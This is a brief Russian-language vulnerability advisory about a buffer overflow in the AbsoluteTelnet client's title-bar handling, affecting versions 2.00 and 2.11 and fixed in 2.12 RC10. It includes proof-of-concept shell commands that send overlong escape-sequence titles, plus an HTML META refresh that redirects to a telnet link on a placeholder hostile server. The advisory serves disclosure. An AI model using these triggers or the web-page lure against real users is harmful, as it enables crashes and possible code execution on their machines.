Переполнение буфера обнаружено в AbsoluteTelnet. Удаленный атакующий может выполнить произвольный код с пользовательскими привилегиями.
Переполнение обнаружено в функции titlebar. Пример:
export KNUD=`perl -e 'print "A" x 174'`
echo -ne "\033]0;$KNUD\007"
export KNUD=`perl -e 'print "A" x 296'`
echo -ne "\033]0;$KNUD\007"
Если AbsoluteTelnet клиент конфигурирован как telnet клиент по умолчанию, то уязвимость может использоваться через специально сформированную Web страницу. Пример:
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=telnet://hostile.serv.er">
Уязвимость обнаружена в AbsoluteTelnet 2.00, 2.11 и устранена в 2.12 RC10